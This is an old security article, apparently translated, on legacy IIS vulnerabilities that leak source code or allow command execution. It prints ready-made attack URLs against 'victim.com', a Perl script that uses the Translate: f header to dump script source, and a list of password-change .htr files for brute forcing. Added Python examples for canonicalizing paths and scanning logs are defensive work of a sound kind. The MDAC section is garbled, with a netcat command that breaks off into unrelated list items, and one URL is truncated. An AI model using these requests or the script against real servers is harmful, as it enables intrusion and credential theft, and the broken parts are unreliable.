BY xundi
========= MDAC - Local command execution ===========

You may think this vulnerability is too old, but there are still a surprisingly large number of IIS web servers that have it. The MDAC component of IIS contains a vulnerability that allows an attacker to execute commands on your system remotely. The core of the problem lies in RDS DataFactory: by default it allows remote commands to be sent to the IIS server, and those commands run as the user the service runs as, which by default is SYSTEM. Many articles describe this vulnerability clearly, so it is not explained in detail here. If you want to check whether you have this vulnerability, you can use the following:

c:\> nc -nw -w 2
4. Only files on the same partition can be viewed (so installing the IIS directory on a different partition from the Winnt partition is a good idea; it also helps against the latest IIS 5.0 Unicode vulnerability).
5. The attacker needs to know the name of the requested file.

For example, if you find this file and the above requirements are met, you can send the following request to view the source code of codebrws.asp:

http://www.victim.com/iissamples/exair/howitworks/codebrws.asp?Source=/iissamples/exair/howitworks/codebrws.asp

You can also use showcode.asp to view files:

http://www.victim.com/msadc/Samples/SELECTOR/showcode.asp?Source=/msadc/../../../../winnt/win.ini

Of course, I would rather look at some FTP log information to find other machines the target administrator uses frequently; perhaps the security of his other machines is worse than that of the web server ;). For example:

http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?Source=/msadc/Samples/Winnt/System32/Logfiles/MSFTPSVC1/EX00517.LOG

========= Null.htw ===============

If Index Server is running on IIS, it contains a vulnerability related to null.htw, even though no file ending in .htw exists on the server. This vulnerability leaks the source code of ASP scripts, including sensitive information such as the user names and passwords in Global.asa. If a specially crafted URL request is sent to IIS, it can break out of the virtual directory and give access to the logical partitions and the root directory. The "hit-highlighting" function does not adequately restrict which kinds of files Index Server will return, so an attacker can access any file on the server. The null.htw function takes three variables from user input:

CiWebhitsFile
CiRestriction
CiHiliteType

You can pass the variables as follows to obtain the source code of a file such as default.asp:

http://www.victim.com/null.htw?CiWebhitsFile=/default.asp%20&%20CiRestriction=none%20&%20CiHiliteType=full

A real .htw file is not needed, because the virtual file is already held in memory.

======== WebHits.dll & .htw ================

The hit-highlighting feature is provided by Index Server to let a web user see a document with the terms of their original search highlighted. The name of the document is passed to the .htw file through the variable CiWebhitsFile; webhits.dll is the ISAPI application that handles the request, opens the file and returns the result. Because the user controls the CiWebhitsFile parameter passed to the .htw, they can request any file, which leads to viewing ASP source and the contents of other script files.
To find out whether you have this vulnerability, you can request the following: http://www.victw

If the server returns the following message:

format of the QUERY_STRING is invalid

then you have this vulnerability. The root of the problem is the mapping of the .htw extension to webhits.dll, so you can avoid this vulnerability by removing that mapping. You can search a system you suspect is vulnerable for .htw files; usually the following are found:

/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw (this one is generally restricted to loopback use)

An attacker can use the following method to access the contents of files on a vulnerable system:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?CiWebhitsFile=/../../winnt/win.ini&CiRestriction=none&CiHiliteType=full

=== ASP Alternate Data Streams (::$DATA) ==================

This vulnerability was published in mid-1998. $DATA is the attribute of an NTFS file that holds its main data stream. By constructing a URL in a special format, you can make IIS return this data stream in the browser, which exposes the script source code contained in the file. The vulnerability has the following limitations: first, the file to be displayed must be stored on an NTFS partition (unfortunately, for "security" reasons many servers are set up with NTFS); second, the file must be set to world-readable; and the unauthorized user needs to know the file name. IIS 1.0, 2.0, 3.0 and 4.0 on Windows NT have this problem.

Microsoft provides a patch for IIS 3.0 and 4.0; see the article "Supporting NTFS Alternate Data Streams By Asking Windows NT To Make The File Name Canonical". To view the content of an .asp file, you can get its source code with the following URL:

http://www.victim.com/default.asp::$DATA
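The fix Microsoft's article title refers to is canonicalization: decide how to handle a request only after the name has been reduced to the form NTFS will actually open. The following is an added example, written for this page and not Microsoft's or IIS's code, of a request resolver that applies that idea to the ::$DATA trick above and to the related problems this page goes on to describe (trailing dots on .asp, space padding before .htr, and the .htw/.htr/.idc/.idq/.ida mappings it recommends removing). The web root `/inetpub/wwwroot`, the function name `resolve`, and the three extension sets are assumptions made for the example.

```python
"""Canonicalize a requested file name before choosing a handler by extension.

Added example (not Microsoft's or IIS's code).  WEB_ROOT, the extension
sets and the function names are assumptions made for the example.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/inetpub/wwwroot"  # hypothetical content root

# Mappings this page recommends removing (webhits.dll, ISM.dll, httpodbc/idq).
UNMAPPED = {".htw", ".htr", ".idc", ".idq", ".ida"}
SCRIPT = {".asp", ".asa"}            # run through the script engine, never served raw
STATIC = {".htm", ".html", ".gif", ".jpg", ".txt"}


def resolve(raw_path):
    """Return ('deny', reason), ('script', file) or ('static', file) for a URL path."""
    path = unquote(raw_path)

    # NTFS alternate data stream syntax (name::$DATA) is never a legitimate request.
    if "::" in path:
        return ("deny", "alternate data stream syntax")
    if any(ord(c) < 32 for c in path):
        return ("deny", "control character in path")

    # NTFS ignores trailing dots and spaces when opening a file, so "sample.asp."
    # really opens "sample.asp".  Strip them per component before looking at the
    # extension, but leave "." and ".." alone so normpath can resolve them.
    parts = [p.rstrip(". ") if p.strip(". ") else p for p in path.split("/")]
    cleaned = "/".join(parts)

    # Resolve "..": anything that lands outside the content root is refused
    # (this covers the Source=/msadc/../../winnt/win.ini style of request).
    full = posixpath.normpath(posixpath.join(WEB_ROOT, cleaned.lstrip("/")))
    if not full.startswith(WEB_ROOT + "/"):
        return ("deny", "path escapes web root")

    # Only now take the extension, from the canonical name NTFS will open.
    ext = posixpath.splitext(full)[1].lower()
    if ext in UNMAPPED:
        return ("deny", f"{ext} mapping removed")
    if ext in SCRIPT:
        return ("script", full)
    if ext in STATIC:
        return ("static", full)
    return ("deny", "unknown extension")


if __name__ == "__main__":
    for req in ("/default.asp::$DATA", "/sample.asp.", "/global.asa%20%20%20.htr",
                "/null.htw", "/msadc/../../../../winnt/win.ini", "/index.htm"):
        print(f"{req:40} -> {resolve(req)}")
```

The important ordering is that the stream syntax and trailing-dot handling happen before the extension is examined; taking the extension from the raw URL is exactly what let "default.asp::$DATA" and "sample.asp." reach the static-file path.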
To understand the data stream problem in the NTFS file system, you can read this article: http://focus.silversand.net/newsite/skill/NTFS.TXT

========= ASP Dot bug ====================

This is a relatively early vulnerability, a defect discovered in 1997. It also leaks ASP source code to an attacker. It typically exists on IIS 3.0: adding one or more dots to the end of the requested URL leaks the ASP source code.

http://www.victim.com/sample.asp.

======= ISM.dll buffer truncation vulnerability ===============

This vulnerability was first discovered by the Cerberus Information Security Team. It affects IIS 4.0 and 5.0 and allows attackers to view the contents and source code of any file. By appending roughly 230 "%20" sequences (these represent spaces) after a file name, then adding the .htr suffix and sending this special request to IIS, IIS is made to believe that the client is requesting a .htr file. The .htr suffix is mapped to the ISM.dll ISAPI application, so IIS hands the .htr request to that DLL, and ISM.dll then opens and processes the file passed to it. But because ISM.dll truncates the buffer beforehand, the truncated .htr suffix is lost and part of the contents of the file you want to open is returned. Unless the web service is stopped and restarted, this attack can only be carried out once: if a .htr request has already been sent to the machine, the attack fails. It only works when ISM.dll is first loaded into memory. CNNS found that by varying the number of appended characters the attack can be repeated.

http://www.victim.com/global.asa(...<=230)global.asa.htr

=================== .idc & .ida bug ===================

This vulnerability is actually similar to the ASP dot vulnerability. It reveals the web directory path on IIS 4.0, and strangely enough this kind of vulnerability is still found on some IIS 5.0 systems. Appending the .idc or .ida suffix to the URL causes IIS to attempt to run the .idc; if the .idc does not exist, IIS returns some information to the client.

http://www.victim.com/anything.idc or anything.idq

=================== +.htr bug ===================

This vulnerability, from NSFOCUS, is similar: appending .htr to a URL request for certain .asa and .asp files leads to disclosure of the file's source code:

http://www.victim.com/global.asa.htr

=========== NT Site Server adsamples vulnerability ======

By requesting site.csc, which is generally stored at /adsamples/config/site.csc, an attacker may obtain some information, for example details of the database:

http://www.victim.com/adsamples/config/site.csc

========== Brute force through the .htr programs ===========

IIS 4.0 contains an interesting feature that allows remote users to attack the user accounts on the web server; even if your web server's address is translated through NAT, it can still be attacked. Every IIS 4.0 installation creates a virtual directory /iisadmpwd that contains several .htr files. Anonymous users are allowed to access these files, and they are not restricted to the loopback address (127.0.0.1). Requesting these files pops up a dialog that lets you change a user's account password through the web. The directory is physically mapped to c:\winnt\system32\inetsrv\iisadmpwd and contains:

achg.htr
aexp.htr
aexp2.htr
aexp2b.htr
aexp3.htr
aexp4.htr
aexp4b.htr
anot.htr
anot3.htr

With these, attackers can guess your passwords. If you do not use this service, delete this directory first.

============= Translate: f bug ====================

Daniel Docekal published this vulnerability on August 15, 2000 (www.securityfocus.com/bid/1578). The problem lies in WebDAV in Office 2000 and FrontPage 2000 Server Extensions.
When someone requests an ASP/ASA or other script with a "Translate: f" header added to the HTTP GET request and a special suffix appended to the requested file, the file's source code is displayed; this of course applies to systems without the Win2K SP1 patch.

This is a W2K vulnerability, but since FP2000 can also be installed on IIS 4.0, the vulnerability exists on IIS 4.0 as well. You can use the following script to check for this vulnerability:

```perl
#############################
use Socket;
my ($port, $sock, $server);
$size = 0;
#############################
$server = "$ARGV[0]";
$s      = "$server";
$port   = "80";
$cm     = "$ARGV[1]";
&connect;

sub connect {
    if ($#ARGV < 1) { howto(); exit; }
    # GET the file with a trailing backslash (%5C) and the Translate: f header
    $ver = "GET /$cm%5C HTTP/1.0\nHost: $server\nAccept: */*\nTranslate: f\n\n";
    my ($iaddr, $paddr, $proto);
    $iaddr = inet_aton($server)           || die "Error: $!";
    $paddr = sockaddr_in($port, $iaddr)   || die "Error: $!";
    $proto = getprotobyname('tcp')        || die "Error: $!";
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
    connect(SOCK, $paddr)                 || die "Error: $!";
    send(SOCK, $ver, 0)                   || die "Can't send packet: $!";
    open(OUT, ">$server.txt");
    print "Dumping $cm to $server.txt\n";
    # Write the server's response to the output file
    while (<SOCK>) {
        print OUT $_;
    }
    close(OUT);
    close(SOCK);
}

sub howto {
    print "Usage: $0 <server> <file>\n";
}
```
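Every vulnerability on this page leaves a distinctive request in the IIS log, so the quickest way to find out whether anyone has tried them against a server is to scan the logs. The following is an added example, written for this page and not the author's code, of a detector for those request patterns. It assumes a W3C-style log with the seven fields date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query and sc-status; the log lines embedded in it are constructed for the example, and the RDS DataFactory endpoint path `/msadc/msadcs.dll` is an assumption (the page names the component, not the URL). The Translate: f bug cannot be detected this way because request headers are not logged.

```python
"""Scan IIS W3C-style log lines for the request patterns described on this page.

Added example, not the author's code.  The log format, rule names and the
sample lines below are constructed for the example.
"""
import re
from urllib.parse import unquote

LOG_FIELDS = ("date", "time", "c_ip", "method", "stem", "query", "status")

# Constructed sample log (not from a real server).
SAMPLE_LOG = """\
2000-05-17 10:01:02 203.0.113.7 GET /default.asp - 200
2000-05-17 10:01:09 203.0.113.7 POST /msadc/msadcs.dll - 200
2000-05-17 10:02:11 203.0.113.7 GET /iissamples/exair/howitworks/codebrws.asp Source=/iissamples/exair/howitworks/codebrws.asp 200
2000-05-17 10:02:40 203.0.113.7 GET /msadc/Samples/SELECTOR/showcode.asp Source=/msadc/../../../../winnt/win.ini 200
2000-05-17 10:03:05 203.0.113.7 GET /null.htw CiWebhitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=full 200
2000-05-17 10:03:30 203.0.113.7 GET /iissamples/issamples/oop/qfullhit.htw CiWebhitsFile=/../../winnt/win.ini&CiRestriction=none&CiHiliteType=full 200
2000-05-17 10:04:00 203.0.113.7 GET /default.asp::$DATA - 200
2000-05-17 10:04:20 203.0.113.7 GET /sample.asp. - 200
2000-05-17 10:05:00 203.0.113.7 GET /global.asa%20%20%20%20.htr - 200
2000-05-17 10:05:30 203.0.113.7 GET /anything.idc - 404
2000-05-17 10:06:00 203.0.113.7 GET /global.asa.htr - 200
2000-05-17 10:06:30 203.0.113.7 GET /adsamples/config/site.csc - 200
2000-05-17 10:07:00 203.0.113.7 GET /iisadmpwd/aexp2.htr - 200
2000-05-17 10:07:30 127.0.0.1 GET /iisadmpwd/aexp2.htr - 200
2000-05-17 10:08:00 198.51.100.3 GET /products/list.asp id=42 200
"""


def parse_line(line):
    """Split one log line into a dict, decoding %xx so padded names are visible."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(LOG_FIELDS):
        return None
    rec = dict(zip(LOG_FIELDS, parts))
    rec["stem"] = unquote(rec["stem"])
    rec["query"] = unquote(rec["query"])
    return rec


def param(query, name):
    """Value of a query-string parameter, matched case-insensitively."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None


def reveals_source(target):
    """A file argument that walks up the tree or names a script/config file."""
    t = target.lower()
    return ".." in t or t.endswith((".asp", ".asa", ".ini", ".log"))


def check(rec):
    """Return the names of every pattern from this page that the record matches."""
    stem, query, ip = rec["stem"].lower(), rec["query"], rec["c_ip"]
    hits = []
    if stem.endswith("/msadc/msadcs.dll"):                    # RDS DataFactory (MDAC)
        hits.append("mdac-rds")
    if stem.endswith(("codebrws.asp", "showcode.asp")):       # sample file viewers
        src = param(query, "Source")
        if src and reveals_source(src):
            hits.append("sample-viewer")
    if stem.endswith(".htw"):                                 # null.htw / webhits.dll
        target = param(query, "CiWebhitsFile")
        if stem.endswith("/null.htw") or (target and reveals_source(target)):
            hits.append("htw-webhits")
    if "::$data" in stem:                                     # NTFS alternate stream
        hits.append("ntfs-ads")
    if re.search(r"\.as[pa]\.+$", stem):                      # ASP dot bug
        hits.append("asp-dot")
    if stem.endswith(".htr"):
        if re.search(r"\.as[pa] *\.htr$", stem):              # +.htr and ISM.dll padding
            hits.append("htr-suffix")
        elif "/iisadmpwd/" in stem and not ip.startswith("127."):
            hits.append("iisadmpwd-remote")                   # password .htr from outside
    if stem.endswith((".idc", ".idq", ".ida")) and rec["status"] == "404":
        hits.append("idc-path-leak")                          # missing .idc reveals path
    if stem.endswith("/adsamples/config/site.csc"):
        hits.append("site-csc")
    return hits


def scan(log_text):
    """Yield (line number, rule, client ip, stem) for every suspicious request."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for name in check(rec):
            findings.append((n, name, rec["c_ip"], rec["stem"]))
    return findings


if __name__ == "__main__":
    for n, name, ip, stem in scan(SAMPLE_LOG):
        print(f"line {n:2}: {name:16} {ip:14} {stem}")
```

Run against the sample it reports twelve hits and stays silent on the ordinary requests and on the loopback /iisadmpwd access, which is the one case the page says is legitimate. Decoding the URL before matching matters: the ISM.dll request only becomes recognisable once the run of %20 turns back into spaces.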